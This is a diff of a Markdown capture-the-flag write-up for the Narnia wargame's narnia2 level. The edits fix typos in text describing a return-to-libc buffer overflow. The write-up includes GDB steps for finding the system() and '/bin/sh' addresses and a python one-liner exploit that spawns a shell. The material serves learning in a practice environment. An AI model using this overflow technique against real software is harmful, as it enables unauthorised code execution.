adamstebbing/CTF_Writeups/Narnia.md

     return 0;
 }
 ```
-Since I really did a return-to-libc exploit as part of my Masters, I decided to go with that approach.
-So after testing how to overwrite the instruction pointer (EIP), we found 132 was the amount of byes we needed to fill to get where we needed.
+Since I recently did a return-to-libc exploit as part of my Masters, I decided to go with that approach.

+After testing how to overwrite the instruction pointer (EIP), we found 132 was the amount of bytes we needed to fill.
 After loading up the program in **GDB**, we found the address of the system command by using `print system` (it was 0xf7e4c850).
 Next we used the find command to locate the string `/bin/sh` in libc by entering `find &system, +999999, "/bin/sh"`.
 The only pattern found was at 0xf7f6ecc8.
 We used this information to craft the exploit below. _Note: We use the address 0xf7e11010 as useless information to overflow the return address and get to function input where we put "/bin/sh"_

 ```
 narnia2@narnia:~$ /narnia/narnia2 $(python -c 'print "A"*132+"\x50\xc8\xe4\xf7\x10\x10\xe1\xf7\xc8\xec\xf6\xf7"')